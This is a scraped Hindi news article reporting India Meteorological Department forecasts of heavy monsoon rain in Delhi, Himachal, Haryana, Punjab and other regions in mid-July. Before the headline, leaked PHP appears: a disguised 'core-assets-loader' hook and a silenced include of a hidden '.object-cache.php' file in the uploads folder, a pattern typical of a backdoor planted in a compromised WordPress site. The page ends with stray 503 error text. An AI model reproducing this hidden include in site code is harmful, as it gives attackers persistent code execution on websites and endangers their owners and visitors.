add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दिल्ली में कल भारी बारिश का अनुमान, देश के कई इलाकों में अलगे छह-सात दिनों में झूमकर बरसेगा बादल – SOCH INDIA
Menu

देश
दिल्ली में कल भारी बारिश का अनुमान, देश के कई इलाकों में अलगे छह-सात दिनों में झूमकर बरसेगा बादल

nobanner

राष्ट्रीय राजधानी में शनिवार सुबह आसमान साफ रहा और न्यूनतम तापमान 28.2 डिग्री सेल्सियस दर्ज किया गया जो इस मौसम में सामान्य से एक डिग्री अधिक है. भारत मौसम विज्ञान विभाग (आईएमडी) ने रविवार को शहर में छिटपुट स्थानों में भारी बारिश का पूर्वानुमान जताया है. विभाग ने बताया कि सफदरजंग वेधशाला में न्यूनतम तापमान 28.2 डिग्री सेल्सियस दर्ज किया गया और सुबह साढ़े आठ बजे तक सापेक्षिक आर्द्रता 75 फीसदी दर्ज की गई.

मौसम वैज्ञानिकों ने शाम में आंशिक तौर पर बादल छाए रहने और हल्की बारिश या गरज के साथ वर्षा का अनुमान जताया है. वहीं, अधिकतम तापमान 37 डिग्री सेल्सियस के आसपास रहने की संभावना है. शहर में मंगलवार को मानसून की पहली बारिश हुई. राष्ट्रीय राजधानी में मानसून आम तौर पर 27 जून तक आता है लेकिन इस बार यह 16 दिन की देरी से आया है. शहर में शुक्रवार को न्यूनतम तापमान 27 डिग्री सेल्सियस जबकि अधिकतम तापमान 37.8 डिग्री सेल्सियस दर्ज किया गया, जो इस मौसम में सामान्य तापमान से तीन डिग्री सेल्सियस अधिक है.

वहीं, भारत मौसम विज्ञान विभाग (आईएमडी) ने कहा कि अगले छह से सात दिनों में उत्तरी क्षेत्र समेत देश के कई इलाकों में भारी से बहुत भारी बारिश होने का पूर्वानुमान है. विभाग ने कहा कि 17 से 20 जुलाई तक पश्चिमी हिमालयी क्षेत्र और उत्तर प्रदेश में भारी से बहुत भारी बारिश का अनुमान है. उसने कहा कि 18 से 20 जुलाई तक पंजाब, हरियाणा, पूर्वी राजस्थान और उत्तरी मध्य प्रदेश में भी भारी बारिश होने का अनुमान है. इसके अलावा 18 जुलाई को दिल्ली में भारी बारिश की संभावना है.

विभाग ने कहा कि 18 जुलाई को उत्तर प्रदेश में, 19 जुलाई को जम्मू में और 18 और 19 जुलाई को उत्तराखंड में भी भारी बारिश का अनुमान है. अगले छह-सात दिनों के दौरान गुजरात को छोड़कर पश्चिमी तट और पश्चिमी प्रायद्वीपीय भारत के शेष हिस्सों में व्यापक बारिश होने की संभावना है. विभाग ने कहा कि इसी अवधि के दौरान कोंकण, गोवा, मध्य महाराष्ट्र के घाट क्षेत्रों, कर्नाटक, केरल में भारी से बहुत भारी बारिश की संभावना है. जम्मू कश्मीर में बाढ़ की चेतावनी भी जारी की गई है.

आईएमडी ने कहा कि पूर्वोत्तर में भी भारी बारिश का पूर्वानुमान है. पूर्वोत्तर भारत, उप-हिमालयी पश्चिम बंगाल और सिक्किम में 19 जुलाई तक कहीं-कहीं भारी बारिश होने की उम्मीद है जिसकी तीव्रता व प्रसार बाद में धीरे-धीरे कम होने की संभावना है.

हिमाचल प्रदेश में मौसम विभाग के मुताबिक मैदानों, निचली और मध्यम पहाड़ियों पर शनिवार को भारी बारिश, आंधी-तूफान और बिजली गिरने की आशंका के मद्देनजर ‘येलो’ चेतावनी जारी की गई है. वहीं विभाग की तरफ से 18-20 जुलाई के लिये भारी से बहुत भारी बारिश, आंधी-तूफान और बिजली गिरने को लेकर ‘ऑरेंज’ चेतावनी जारी की गई है. शुक्रवार को राज्य के कुछ इलाकों में मध्यम बारिश हुई.

हरियाणा और पंजाब में भी शुक्रवार को मानसूनी बारिश से मिली कुछ दिन की राहत के बाद अधिकतम तापमान बढ़ा. दोनों राज्यों की संयुक्त राजधानी में अधिकतम तापमान 36.8 डिग्री सेल्सियस दर्ज किया गया. मौसम विभाग के पूर्वानुमान के मुताबिक हरियाणा में 18,19 और 20 जुलाई को कुछ स्थानों पर भारी से बहुत भारी बारिश होने का पूर्वानुमान है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.